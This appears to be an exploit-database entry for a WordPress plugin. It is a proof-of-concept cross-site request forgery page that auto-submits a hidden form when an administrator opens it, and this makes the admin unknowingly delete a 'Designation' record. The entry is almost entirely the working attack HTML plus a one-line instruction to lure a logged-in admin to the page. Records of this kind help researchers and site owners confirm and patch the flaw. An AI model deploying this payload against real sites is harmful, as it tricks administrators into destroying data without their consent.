Share
## https://sploitus.com/exploit?id=WPEX-ID:9BE952E0-D8AE-440F-8819-CB19485F35F3
Make a logged in admin open a page with the code below, this will make them delete the Designation with ID 2
        
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=cip-designations" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>